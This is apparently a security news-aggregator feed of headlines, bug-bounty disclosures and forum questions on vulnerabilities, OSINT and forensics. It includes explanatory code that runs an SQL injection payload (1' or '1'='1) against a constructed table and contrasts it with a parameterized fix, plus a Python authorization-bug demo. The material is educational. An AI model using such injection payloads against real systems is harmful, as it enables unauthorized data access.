    Top-tier hackers often use only the most basic attack methods.
    FreeBuf Morning Report | Multiple Italian government websites knocked offline by DDoS attacks; Apple rushes fix for zero-day
    Apple has released security updates to address a zero-day vulnerability that threat actors could exploit to attack Mac and Apple Watch devices.

    Modern Technology Exploits and Analysis


    [case study#1] IDOR vulnerability allows access to user’s personal data
    What is IDOR?
    The Bucket’s Got a Hole in it
    Introduction
    Bug Bounty from Meta Pool
    Meta Pool has published a Bug Bounty program in its GitBook, in which anyone who discovers a bug or vulnerability in… can take part.
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why is it utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with…
    Bounty Hacker Walkthrough — Try Hack Me
    You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove…

    Malcolm v6 released on GitHub, now including Suricata and more new protocol parsers
    submitted by /u/mmguero
    F5 BIG-IP critical vulnerability exploited by attackers to gain unauthenticated RCE
    submitted by /u/sciencestudent99
    Shielder - Printing Fake Fiscal Receipts - An Italian Job p.2
    submitted by /u/smaury
    From Project File to Code Execution: Exploiting XINJE PLC Program Tool
    submitted by /u/derp6996
    SMM Callouts in HP Products
    submitted by /u/lightgrains
    GitHub - gabriel-sztejnworcel/pipe-intercept: Intercept Windows Named Pipes communication using Burp or similar HTTP proxy tools
    submitted by /u/gabrielszt
    Technical Advisory – Bluetooth Low Energy Proximity Authentication Vulnerable to Relay Attacks
    submitted by /u/digicat

    Computer image analysis - online trials
    There was a website where you could download a computer image and you would answer questions about the image to finish the challenge (who last logged on?, etc.), and I can't seem to find it again. Does something like that still exist? submitted by /u/hamsterbilly
    Password protected RAR file!
    I have a password-protected RAR file on one of my servers; it was found in the system folder. I am not considering it malware because its size is 90MB+, but I do want to know what's inside it! Brute force doesn't seem like a good idea; what other options do I have? Looking for help and guidance from the good people of computer forensics!! submitted by /u/Supra02

    Privilege Escalation on TikTok for Business
    TikTok disclosed a bug submitted by naaash: https://hackerone.com/reports/1505567 - Bounty: $2500
    Site information's Display Name section vulnerable for XSS attacks and HTML Injections.
    Automattic disclosed a bug submitted by sawrav-chowdhury: https://hackerone.com/reports/1554888 - Bounty: $150
    Security misconfiguration
    lemlist disclosed a bug submitted by mr23r0: https://hackerone.com/reports/1486327
    CVE-2022-27781: CERTINFO never-ending busy-loop
    curl disclosed a bug submitted by sybr: https://hackerone.com/reports/1555441
    HTTP Request Smuggling in Transform Rules using hexadecimal escape sequences in the concat() function
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1478633 - Bounty: $6000

    Check the public GitHub repositories for CVE vulnerabilities
    Article URL: https://memgraph.com/blog/graph-data-zagreb-summary-april-2022 Comments URL: https://news.ycombinator.com/item?id=31402433 Points: 1 # Comments: 0

    An OS tool for storing, searching, and displaying news wires
    An OSINT way to read, analyse, and compare news outlets which use Telegram.
    War in Ukraine / May 14–15
    The Molfar team sends a daily newsletter about the war in Ukraine.
    OSINT: Do I have to Capture The Flag? Pt2.
    Making a persona that’s even faker than your social media identity.

    Putting the team in red team
    One of the more common questions we receive during a red team scoping call or RFP Q&A call is, how many dedicated consultants will be involved in the assessment? There is no “correct” answer to this question, and ultimately, the answer as to how red team engagements are staffed comes down to how the consultancy... The post Putting the team in red team appeared first on TrustedSec.

    Block calendy.com spam
    All, is there a good way to block someone trying to spam us using calendy.com without simply blocking everything from calendy.com? Situation: We have some folks who are getting hammered by someone sending constant Calendy event invites. I'm guessing it's some sort of bot, as there are several different Gmail addresses as the other invitee. submitted by /u/twrolsto
    What jobs to look for after Vulnerability Analyst / Management?
    I want to start getting the needed requirements and experience for a position after this, but I'm not sure what job title I would be searching for, or what comes next in the chain of jobs. I would like to go to a more red-team-focused role, but honestly, my main aim is a better salary. submitted by /u/Dependent-Context-43
    How do you make writing reports more pleasant? [Penetration tests]
    Hi, I've been writing reports for a while now, but I'm struggling big time. Our methodology is pretty complicated and I want to automate it. We write the vulnerabilities in Markdown, render with pandoc into a Word file, then take it and merge it with the Word template. Then validate, make corrections and export it to PDF. The good part is that we don't have to fix styles when writing it, but I'm sure there must be a better way to do it. I've researched a few options but can't find a good one. I'm thinking about creating a web app with a DB containing all the vulnerabilities that were used in the reports, so it will be easier to import them. Some of them, for example for missing headers, will only have an option to import an image with the proof of concept, with previously prepared static text containing the information. In other vulnerabilities that need additional writing there will be placeholders. Somehow I think my idea will take way too long; any ideas or tips will be highly appreciated. PS. I've noticed that taking trashy notes additionally slows down my reporting process. Can you suggest editors like OneNote (including images) that you can use on both Windows and Linux? Thanks! submitted by /u/tryingtoworkatm
    Sysmon on Linux
    Hi everyone, what is your take on installing Sysmon on Linux hosts in terms of volume and benefit, and is there any configuration file like SwiftOnSecurity's for Windows? Your detailed information is highly appreciated. submitted by /u/azizalmarfadi
    Security consultant interview tips
    I have a graduate security consultant interview next week and would like a few tips on how to impress the interviewer (they are a senior member of the company). I really want this role, as I want to push myself this year. Many thanks! submitted by /u/Appreciatingthegoods

    API Security Offence and Defence: Introduction to API
    submitted by /u/cybersocdm
    I'm new to binary exploitation and my interests lie in security for IoT devices. I need suggestions on what I should learn
    I already know I should learn C and read the Shellcoder's Handbook, and I know some CTFs, but I don't know if they're good for IoT. What I aim for is to not waste any effort learning unnecessary info and, most importantly, to start off with something really basic and easy. Can you guys suggest where to begin, which CTFs I should tackle, what path I should take, and finally what I should avoid (a crude example: people interested in binary exploitation of PCs should learn about x86 instead of wasting time on MIPS or ARM)? submitted by /u/winter-stalk

    SecWiki News 2022-05-16 Review
    Cybersecurity entrepreneurship from 0 to 1: talk transcript by ourren; Rethinking "cyberspace has no borders" in light of the Russia-Ukraine conflict by ourren; The Russia-Ukraine war situation as seen through cyberspace mapping, and its lessons for us by ourren; SecWiki Weekly (Issue 428) by ourren; (Translation) How to put SLSA into practice by ourren; MySQL security configuration baseline by SecIN Community; Flaws in the DNSAML service of some endpoint security software by Avenger. For more of the latest articles, visit SecWiki
  • Open

    UK government sits out bug bounty boom but welcomes vulnerability disclosure
    Article URL: https://portswigger.net/daily-swig/uk-government-sits-out-bug-bounty-boom-but-welcomes-vulnerability-disclosure Comments URL: https://news.ycombinator.com/item?id=31398182 Points: 2 # Comments: 0
  • Open

    Gin and Juice Shop: put your scanner to the test
    "Word". We heard that a lot of you have been having problems finding a truly dope vulnerable web application to wave your scanner at. As makers of the web's OG vulnerability scanner, we couldn't be le
  • Open

    A Look Into Public Clouds From the Ransomware Actor's Perspective
    Ransomware in public clouds is rare, but cloud threat actors could adapt their TTPs to be more cloud native. Now is the time to get ahead of it. The post A Look Into Public Clouds From the Ransomware Actor's Perspective appeared first on Unit42.
  • Open

    Module-1 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
  • Open

    2022 Hiring Notice: 中汽数据 (China Automotive Data) Information Security Team
    中汽数据有限公司 (China Automotive Data Co., Ltd.) is hiring three engineers.
    Tackling Endpoint Ransomware Threats from a Security Operations Perspective | FreeBuf Enterprise Community Livestream Recap
    On May 12, 李宗晖 (Li Zonghui), a security architect at an enterprise, was the featured speaker in the third internal livestream of the FreeBuf enterprise community, sharing how to address endpoint ransomware threats from a security operations perspective.
    Hackers Are Exploiting a Critical Vulnerability in Zyxel Firewalls and VPNs
    The vulnerability affects Zyxel enterprise firewall and VPN appliances.
    Pro-Russian Hackers Attack Italian Government Websites
    A pro-Russian hacking group called "Killnet" attacked the websites of several Italian institutions, including the Senate, the National Institute of Health and the national automobile association.
    Lianjia IT Administrator Who Deleted Databases Sentenced to 7 Years in Prison
    A Lianjia employee was sentenced to 7 years in prison for logging into company systems and deleting company data.
    SonicWall: Patch the SMA 1000 Vulnerabilities Immediately
    SonicWall notes that attackers can exploit these vulnerabilities to bypass authorization and potentially compromise vulnerable devices.
    Linux Internal Network Penetration (Part 3): Linux Privilege Escalation
    This article is the second in the Linux internal network penetration series: Linux privilege escalation.
    New Sysrv Botnet Variant Attacking Windows and Linux Servers
    Sysrv-K, a new variant of the Sysrv botnet, is exploiting vulnerabilities in the Spring Framework and WordPress to deploy cryptomining malware on vulnerable Windows and Linux servers.
  • Open

    The Russia-Ukraine War as Seen Through Cyberspace Mapping, and Lessons for Us
    Author: 杨冀龙 (Yang Jilong); WeChat account: 神龙叫; original link: https://mp.weixin.qq.com/s/HLvydDDhTfxK-xWsGEuCpA. Analysing cyberspace mapping data for Russia and Ukraine from before and after the outbreak of the war gives a partial view of how the physical war is going and a more detailed view of the cyber confrontation. 1. Russia's cyberspace defence was at a disadvantage early in the war. Mapping shows that over the past year Russian internet IPs exposed 86.09 million open ports; Ukraine exposed 516...
  • Open

    RedTeam Physical Tools
    Red Team Toolkit — A curated list of tools that are commonly used in the field for Physical Security, Red Teaming, and Tactical Covert… Continue reading on Medium »

  • Open

    Zphisher: Phishing Page Generator
    Zphisher is a tool for generating fake pages with the aim of capturing usernames and passwords. Continue reading on 100security »
    Why I love using NMAP
    Whether you’re in the Information Security industry,played Capture The Flags competitions or maybe you’re just someone that likes Cyber… Continue reading on Medium »
    Best YouTube Channels for Learning Cyber Security
    Best YouTube Channels for learning Cyber Security- Continue reading on Medium »
    Bug bounties, The glamour.
    Hello to the readers, it’s been a while since i wrote on medium and today this morning i feel like writing something out after analysing… Continue reading on Medium »
    Why enumerate folders and files - A valuable simple technic
    The enumeration technique is used to recognize the target environment to obtain information about files or folders that exists on a web… Continue reading on Medium »
  • Open

    X — the Pornographic Gorefest That is Neither
    A lesser A24 has much to offer in theme and thesis, but it’s got no meat on the bones. Continue reading on The Movie Chaser »
  • Open

    Using Stolen IAM Credentials - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]
    MITM_Intercept: A little less hackish way to intercept and modify non-HTTP protocols through Burp & others.
    submitted by /u/jat0369 [link] [comments]
  • Open

    us military…..like everything
    Yes, it's not quite an OD... BUT! Yes, it's interesting af and I felt like I would be sinning if I didn't share this. https://www.militarynewbie.com/military-manuals/ submitted by /u/Salty_Ad_69 [link] [comments]
    Anybody got all of Black Clover on gdrive?
    submitted by /u/Left_Command_9458 [link] [comments]
  • Open

    Internet devices in country domain
    How do I search for specific IoT devices or firewalls, filtered by country domain, region or locality? It occurs to me that I could extract information from SSL certificates, or things like that. Has anyone made a similar script that could be useful to me? submitted by /u/N0xFE [link] [comments]
    OpenVPN help
    Hello all, I have an IT Security interview in the next few weeks for a graduate role and I will have to use OpenVPN to access applications. I've never done this before, so how can I prepare for this? Thank you everyone submitted by /u/Appreciatingthegoods [link] [comments]
    OTP brute force in Zap
    So I am trying to do a lab on PortSwigger, but the payload that I want to use is not working, as it starts from 999 and goes to 9999. So it is essentially missing the 0xxx-type OTPs. How do I achieve this? submitted by /u/Full_Albatross_5636 [link] [comments]
    Securing family network
    My parents used a very weak password for both our Wi-Fi and the control panel, so obviously I changed those. I also disabled UPnP, as it seems that's another point of vulnerability. What else can I do to tighten up security? submitted by /u/Able-Board-503 [link] [comments]
  • Open

    SQLI-Introduction
    Most modern web applications utilize a database structure on the back-end. Such databases are used to store and retrieve data related to… Continue reading on Medium »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    In the previous article details regarding syntax, variables, and their usage was conveyed. This Final Part Will be about the Installation… Continue reading on InfoSec Write-ups »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    In the previous article details regarding syntax, variables, and their usage was conveyed. This Final Part Will be about the Installation… Continue reading on Medium »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    Hey everyone, I hope you all are doing well. I have been Programming in multiple languages for some time now, so I thought Writing Bash… Continue reading on InfoSec Write-ups »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    Hey everyone, I hope you all are doing well. I have been Programming in multiple languages for some time now, so I thought Writing Bash… Continue reading on Medium »
    How I managed to take over any account visits my profile with Stored XSS
    Hello everybody, today we have a simple Stored XSS vulnerability that leads to stealing cookies and Taking over the account. Let’s start Continue reading on Medium »
    The Bug Hunter's Book: A Roadmap to Becoming a Security Bug Hunter
    It is said, "Do what you love, and you will never feel like you are working again"... One well-known piece of advice for excelling at your work while having fun and earning money at the same time is to do what you love;… Continue reading on Medium »
    How to find vulnerable websites to SQL-Injection vulnerability in real life
    In this writeup you will learn how real hackers find vulnerable websites to SQL-Injection vulnerability to perform this web application… Continue reading on Medium »
  • Open

    Computer Forensics Tools | Kroll Artifact Parser and Extractor | TryHackMe KAPE
    submitted by /u/MotasemHa [link] [comments]
    GIAC GCFE QUESTIONS
    Are the workbooks (exercises) necessary to index? submitted by /u/ScruffyBlackFables [link] [comments]
    Does law enforcement always use digital forensics for devices or drives seized as evidence?
    See title. submitted by /u/bmiller8675 [link] [comments]
  • Open

    SecWiki News 2022-05-15 Review
    No news updates yet today. For more recent articles, visit SecWiki.
  • Open

    How Businesses Can Benefit from Open-Source Intelligence Techniques
    Use of OSINT in business Continue reading on Medium »
    SPY NEWS: 2022 — Week 19
    Summary of the espionage-related news stories for the Week 19 (8–14 May) of 2022. Continue reading on Medium »
  • Open

    [sqli-lab Tutorial] Less-1
    Sharing and learning the sqli-lab tutorial.
    DedeCMS (织梦) Back-end Audit
    The DedeCMS back end allows direct file uploads, including zip files.
  • Open

    Origin IP found, WAF Cloudflare Bypass
    SMTP2GO BBP disclosed a bug submitted by mrrobot2050: https://hackerone.com/reports/1536299 - Bounty: $100

  • Open

    "Zero-Days" Without Incident - Compromising Angular via Expired npm Publisher Email Domains
    submitted by /u/mandatoryprogrammer [link] [comments]
    Three ways to hack an ATM
    submitted by /u/DiabloHorn [link] [comments]
    Exploiting a Use-After-Free for code execution in every version of Python 3
    submitted by /u/DOTheLOGA [link] [comments]
    Reverse engineering Flutter apps
    submitted by /u/lmpact_ [link] [comments]
  • Open

    Best way to capture RAM from an Android device ?
    Research-based, so not worried about being forensically sound. I've tried LiME but couldn't get the compile to work. submitted by /u/Flxtcha [link] [comments]
    View jpg files using linux sleuth kit
    Made a similar post a few days back but wasn't very clear with my question, so I will give it one more try. I have a school exercise where we are using Sleuth Kit in Kali to find information about a USB image that we created using dd. Now in this exercise there is a question asking, "What does picture19.jpg represent?" So basically I have to type a command that opens up the picture and shows it to me, but I don't know which one. I have the inode number, so I tried icat -o but it's just giving me lots of text as output. So what command should I be using instead to view a jpg picture, for example? Hope it was clearer this time! Thanks! submitted by /u/ahmedmourad22 [link] [comments]
  • Open

    War in Ukraine / May 13
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Navigate through but have a look at the Tarot directory!!
    http://80.56.13.139/arc/Miscellaneous/Alternative%20religions%20and%20beliefs/Tarot/ submitted by /u/Appropriate-You-6065 [link] [comments]
    Moldova's ProTV news reports
    u/ODCrawler https://pl.uniflor.biz/ProTV/ Contains several .mp4 with news reports from ProTV in Chisinau, Moldova. submitted by /u/vjandrea [link] [comments]
    Official Hewlett Packard Drivers for Printers
    submitted by /u/Mr_Brightstar [link] [comments]
    British Canoeing
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Domain Persistence: Silver Ticket Attack
    Introduction Benjamin Delpy (the creator of mimikatz) introduced the silver ticket attack at Black Hat 2014 in his Abusing Kerberos session. Silver tickets are forged service The post Domain Persistence: Silver Ticket Attack appeared first on Hacking Articles.
  • Open

    Credential leak on redirect
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1568175
    Disclose STUFF member name and make actions.
    Shopify disclosed a bug submitted by zambo: https://hackerone.com/reports/968174 - Bounty: $500
    Disclose customer orders details by shopify chat application.
    Shopify disclosed a bug submitted by zambo: https://hackerone.com/reports/968165 - Bounty: $2500
    Public Postman Api Collection Leaks Internal access to https://assets-paris-dev.codefi.network/
    Consensys disclosed a bug submitted by polem4rch: https://hackerone.com/reports/1523651 - Bounty: $500
    Download full backup [Mtn.co.rw]
    MTN Group disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1516520
  • Open

    Red Teaming
    Red Teaming is a simulation of a real attacker’s activity that is based on the most up-to-date knowledge regarding risks that are relevant… Continue reading on Medium »
    Cybersecurity Skill
    Cybersecurity Red Team vs. Blue Team: Key Differences Explained Continue reading on Medium »
    SearchMap Information Collection Tool
    Searchmap is a comprehensive information collection tool for pre-penetration testing that integrates domain name resolution, IP reverse… Continue reading on Medium »
  • Open

    Easy to find vulnerabilities that might get paid [part-1]
    Hello everyone It’s me Sankalpa Baral a noob hacker from Nepal hope you all are doing great stuff I am back after a long time so today I… Continue reading on Medium »
    My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees…
    Hay Hunters , Hello Infosec Community Continue reading on Medium »
    Does ms15–034 still exist today ?
    Hi everyone how are you?, I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-14 Review
    CVE-2022-21907 HTTP Protocol Remote Code Execution Vulnerability Analysis Summary by ourren; CVE-2021-34535 RDP Client Vulnerability Analysis by ourren; Front-end JS Attack and Defence by ourren. For more recent articles, visit SecWiki.
  • Open

    X (2022) Review: Opposition and Proximity
    Ti West has a deft touch with horror; his works do not start from an unrecognisable place and always show something peculiar about the… Continue reading on Medium »
  • Open

    How universal is LogRhythm?
    Basically I'm just starting to look into wanting to be a SOC analyst. I am getting my Sec+ right now, work a basic-level IT job trying to get a bit of experience under my belt and have an associate's in IT, but am planning on going back to get my BA (I'm only 22). I've been reading a lot of Reddit posts from here and career questions when I'm bored, and I've been seeing a lot of things talking about trying to practice LogRhythm. Is it important to practice it for every SOC job, or does every company use different programs? I ask because it seems super interesting, and if it can give me a boost in the field, I'd hop right on learning about it. This could be a very dumb question, but I'm still relatively new, so cut me some slack lol submitted by /u/Spirtedgems [link] [comments]
    Incidents to look out for in http log files
    As part of a university assignment I've been given the task of analysing some log files with Splunk to find any incidents on the organisation's network. What should I be looking out for? How can I tell if there's a potential attack on the system such as phishing or malware? submitted by /u/fgtethancx [link] [comments]
    Threat Intelligence at your org
    I have to write a plan for our organization to do threat intelligence. It's for compliance, but we should really start doing something. At the moment, we're looking at a system to automatically gather file hashes, IPs, etc. and put them in our firewalls and other devices. We're also looking at a once-a-month briefing to our C-suite. What are you doing? submitted by /u/Odd-Kale2587 [link] [comments]
  • Open

    Zyxel silently patches command-injection vulnerability with 9.8 severity rating
    Article URL: https://arstechnica.com/information-technology/2022/05/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating/ Comments URL: https://news.ycombinator.com/item?id=31376372 Points: 5 # Comments: 0
  • Open

    Summary and Reflections on Building a DevSecOps Programme at a Large Internet Company
    With the frequent software supply chain attacks and data security incidents of recent years, enterprises face major software supply chain and data breach risks, which has indirectly driven … Continue reading Summary and Reflections on Building a DevSecOps Programme at a Large Internet Company →
    Cloud Offence and Defence, Odds and Ends (Continued)
    The author publicly shared some ideas from the cloud offence-and-defence series several years ago; those interested can look at Red Teaming for Cloud … Continue reading Cloud Offence and Defence, Odds and Ends (Continued) →

  • Open

    Hacking: The Art Of Exploitation
    When studying from this book, am I supposed to learn how every code sample works from scratch or only copy paste it and learn about its purpose and functions from the author? So far I've been rewriting every sample from scratch and making sure I'm understanding it, but at the same time I'm moving too slow and was wondering if that's even the correct approach. submitted by /u/Majestic_Ideal9833 [link] [comments]
  • Open

    Is there any alternative/competitor to DBprotect?
    I'm not a Trustwave fan, BUT that product is excellent at what it does. I'm wondering if there is an alternative to it. I know IBM has Guardium, and I've used it and it is complete garbage. Plus it's really made for constant DB monitoring, not pen-test-style testing/auditing like DBProtect is. submitted by /u/networkalchemy [link] [comments]
    What is the best password manager for me?
    I was talking to a friend regarding password security and they sort of explained password managers. I of course knew they existed, but didn't know there were different kinds. According to my friend, they are roughly divided into three: manual backup, cloud backup and internet sync. My question would be which kind (and which one specifically) would be best suited for me? I live in a city that is insecure, and journalists and researchers are constantly targeted. I am afraid I could either get caught by law enforcement (not because what I do is illegal per se, but abuse of authority is rife here) or get hacked by someone and have my data erased. What would you recommend for someone in my situation? submitted by /u/marypine [link] [comments]
    Is drozer still relevant for mobile pentest?
    Does anyone still use drozer for mobile pentests nowadays? I've just checked its GitHub page https://github.com/FSecureLABS/drozer and found that development has been stopped: "We would like to formally announce that F-Secure has stopped further development of the drozer tool." I tried the docker image and am having a connection refused issue; not sure what is going on. submitted by /u/w0lfcat [link] [comments]
    Bad Experiences Working With BitSight?
    Does anyone have any negative BitSight experiences to share from dealing with them at their companies? I'll go first: their paid service is worthless, their "findings" are filled with false positives, and you have to divert resources to get the score up for underwriter optics, which has nothing to do with improving your actual security posture. I really don't know how they're allowed to legally operate; it's extortion. submitted by /u/Memerkitty [link] [comments]
    tricky python code
    Hi, why does this script show "All our secrets!!! 😨 😩 😱" 2 times??? What makes me lost is why passing a False value gave us the same message???

```
class User:
    """system user"""
    def __init__(self, trusted=False):
        self.trusted = trusted

    def can_login(self):
        """only lets trusted friends read secrets"""
        return self.trusted

def login(user):
    """Gives access to users with privileges."""
    if user.can_login:
        print("All our secrets!!! 😨 😩 😱")
    else:
        print("No secrets for you!")

hacker = User(trusted=False)
friend = User(trusted=True)
login(hacker)
login(friend)
```

    submitted by /u/Spare_Prize1148 [link] [comments]
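    An added example, not code from the post above or from any project, that isolates the behaviour being asked about: `user.can_login` without parentheses evaluates to a bound-method object, and a bound method is always truthy, so the `if` branch is taken for every user. The `User`/`SafeUser` classes and the three `login_*` variants are constructed here for illustration; the property-based variant goes beyond the post by showing a design in which the attribute form cannot silently become an always-true authorization check.

```python
"""Uncalled-method authorization bug, shown beside two fixes (constructed example)."""


class User:
    """System user as in the post; `trusted` is the only authorization attribute."""

    def __init__(self, trusted=False):
        self.trusted = trusted

    def can_login(self):
        """Return True only for trusted users."""
        return self.trusted


def login_buggy(user):
    """Mirrors the post: the predicate is referenced, not called.

    `user.can_login` is a bound method. Python treats any object as truthy
    unless it defines __bool__/__len__, so this is True for every user and
    the authorization check is effectively disabled.
    """
    return bool(user.can_login)


def login_fixed(user):
    """Minimal fix: call the predicate so the decision follows `user.trusted`."""
    return bool(user.can_login())


class SafeUser:
    """Same model, with `can_login` exposed as a read-only property.

    Attribute access now yields the bool itself, so `if user.can_login:` is
    correct, and the other mistake, `user.can_login()`, raises TypeError
    ('bool' object is not callable) instead of failing silently.
    """

    def __init__(self, trusted=False):
        self.trusted = trusted

    @property
    def can_login(self):
        return self.trusted


def login_property(user):
    """Attribute form against SafeUser: no parentheses needed, no truthy-method trap."""
    return bool(user.can_login)


def decisions(login_fn, make_user):
    """Run a login function over an untrusted and a trusted user.

    Returns (untrusted_allowed, trusted_allowed). A correct authorization
    check must return (False, True); the buggy one returns (True, True).
    """
    return (login_fn(make_user(trusted=False)), login_fn(make_user(trusted=True)))


if __name__ == "__main__":
    print("buggy    :", decisions(login_buggy, User))         # (True, True)
    print("fixed    :", decisions(login_fixed, User))         # (False, True)
    print("property :", decisions(login_property, SafeUser))  # (False, True)
    # The root cause made visible: the attribute is callable and truthy.
    print("bound method truthy:", callable(User().can_login), bool(User().can_login))
```

    Static checkers catch this class of mistake too: mypy's `truthy-function` error code flags a function object used in a boolean context, and pylint reports a constant condition, so either would have flagged `if user.can_login:` before it reached a test.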
    Hi, code injection help please
    Hi, I'm typing 1' or ‘1’=’1 in the search box when trying to find all the persons, usernames and passwords in the database. But I get the following error message: There was an error in your query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1. The server version is Apache/2.4.41 (Ubuntu) and I found that it is MariaDB 5.5.41. How can I find the right syntax? Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
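    An added example, not code from the post above or from the lab it describes, that reproduces the two outcomes side by side: the payload as pasted with typographic quotes (‘1’=’1) breaks the statement and produces a syntax error, while the same payload with plain ASCII quotes (1' or '1'='1) closes the string literal and returns every row. SQLite stands in for MariaDB here because it runs offline; the `users` table, its three rows and the two `search_*` functions are constructed for illustration. The parameterized variant is the fix a practitioner would apply to the lab's query builder.

```python
"""String-built query vs. parameterized query under the post's SQLi payload (constructed example)."""
import sqlite3

# Constructed sample data standing in for the lab's persons/usernames/passwords table.
SAMPLE_ROWS = [
    (1, "alice", "s3cret"),
    (2, "bob", "hunter2"),
    (3, "carol", "letmein"),
]

# The payload exactly as typed in the post (ASCII quote first, then typographic quotes),
# and the same payload with plain ASCII single quotes throughout.
CURLY_PAYLOAD = "1' or ‘1’=’1"
ASCII_PAYLOAD = "1' or '1'='1"


def _connect():
    """Fresh in-memory database per call so each query sees identical state."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_vulnerable_sql(term):
    """The query shape that makes the lab injectable: user input spliced into SQL text."""
    return "SELECT id, username, password FROM users WHERE username = '" + term + "'"


def search_vulnerable(term):
    """Execute the string-built query.

    Returns the matching rows, or an "SQL error: ..." string when the
    database rejects the statement, so both payloads can be compared.
    ASCII quotes close the literal and add `or '1'='1'`, which is true for
    every row. Typographic quotes are not string delimiters in SQL, so the
    lone trailing ASCII quote leaves an unterminated literal: a syntax
    error, which is what the post's MariaDB message is reporting.
    """
    try:
        return _connect().execute(build_vulnerable_sql(term)).fetchall()
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"


def search_parameterized(term):
    """Hardened form: the driver binds `term` as data, never as SQL syntax."""
    sql = "SELECT id, username, password FROM users WHERE username = ?"
    return _connect().execute(sql, (term,)).fetchall()


if __name__ == "__main__":
    print("vulnerable, curly quotes :", search_vulnerable(CURLY_PAYLOAD))   # SQL error
    print("vulnerable, ASCII quotes :", search_vulnerable(ASCII_PAYLOAD))   # all three rows
    print("parameterized, ASCII     :", search_parameterized(ASCII_PAYLOAD))  # []
    print("parameterized, real user :", search_parameterized("alice"))
```

    The parameterized version returns nothing for either payload because the whole string is compared against `username` as a value; the only way to get rows out of it is to know a real username.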
  • Open

    Understanding Data Sources and File Formats
    Following on the heels of my previous post regarding file formats and sharing the link to the post on LinkedIn, I had some additional thoughts that would benefit greatly from not blasting those thoughts out as comments to the original post, but instead editing and refining them via this medium. My first thought was, is it necessary for every analyst to have deep, intimate knowledge of file formats? The answer to that is a resounding "no", because it's simply not possible, and not scalable. There are too many possible file formats for analysts to be familiar with; however, if a few knowledgeable analysts, ones who understand the value of the file format information to DFIR, CTI, etc., document the information and are available to act as resources, then that should suffice. With the format a…
  • Open

    error parse uri path in curl
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1566462
    Memory leak in CURLOPT_XOAUTH2_BEARER
    curl disclosed a bug submitted by pappacoda: https://hackerone.com/reports/1567257
    Cookie injection from non-secure context
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1560324
    [Java] CWE-016: Query to detect insecure configuration of Spring Boot Actuator
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1137966 - Bounty: $500
    [CPP]: Add query for CWE-754: Improper Check for Unusual or Exceptional Conditions when using functions scanf
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1549073 - Bounty: $1800
    [Java]: CWE-552 Add sources and sinks to detect unsafe getResource calls in Java EE applications
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1564099 - Bounty: $1800
    [CPP]: Add query for CWE-190: Integer Overflow or Wraparound when using transform after operation
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1564100 - Bounty: $500
    [Java]: CWE-321 - Query to detect hardcoded JWT secret keys
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1567588 - Bounty: $1800
  • Open

    Docker Containers Security Series
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Tom & Jelly - Google Drive video's movie
    submitted by /u/damschreeuwer [link] [comments]
    OtherPeople - Google Drive
    submitted by /u/damschreeuwer [link] [comments]
  • Open

    PowerShell Scripts used to run malicious shellcode. Reverse Shell vs Bind Shell
    submitted by /u/CyberMasterV [link] [comments]
    Hunting evasive vulnerabilities
    submitted by /u/0xdea [link] [comments]
  • Open

    War in Ukraine / May 12
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    A Chasing Scene From Tenet — An OSINT Geo Location Challenge
    Where’s the car? Continue reading on Medium »
    Cool OSINT tools you can use to gather information about a target
    Today I will go over some basic OSINT tools you should know about if you want to gather information about a target. So let’s get started! Continue reading on System Weakness »
    Opening Old Web Page Content or Browsing Internet Archives (of Deleted Pages)
    Sometimes, when gathering data and information from the internet, an auditor needs to revisit a web page to… Continue reading on Medium »
  • Open

    RedTeam and Penetration Testing Checklist
    Red Teaming and Penetration Testing Checklist, Cheatsheet, Clickscript Continue reading on Medium »
    What I learned after hacking my first 20 boxes from Hack the Box…
    This Post is for Beginners from a Beginner’s perspective. Continue reading on Medium »
  • Open

    SecWiki News 2022-05-13 Review
    从ATT&CK V11版发布看ATT&CK的更新历程 by ourren 更多最新文章,请访问SecWiki
  • Open

    MFA (Multi-Factor Authentication)
    Multi-factor authentication is when you use two or more authentication. factors to verify your identity. These factors include Something… Continue reading on Medium »
    Announcing Pay At Triage for Bug Bounty
    By John Turner, Staff Security Technologist & Vinay Venkateswara Rao, Senior Security Technologist Continue reading on Uber Privacy & Security »
    From android app to access admin dashboard
    One of easy and interesting vulnerability that I found and lead to access admin dashboard for company (internal system) : Continue reading on Medium »
    [Bug Bounty] Sql Injection and Bypass Sql Login
    Hi everyone, how are you? I hope all is well. This time I want to share my writing on bug bounty and… Continue reading on Medium »
  • Open

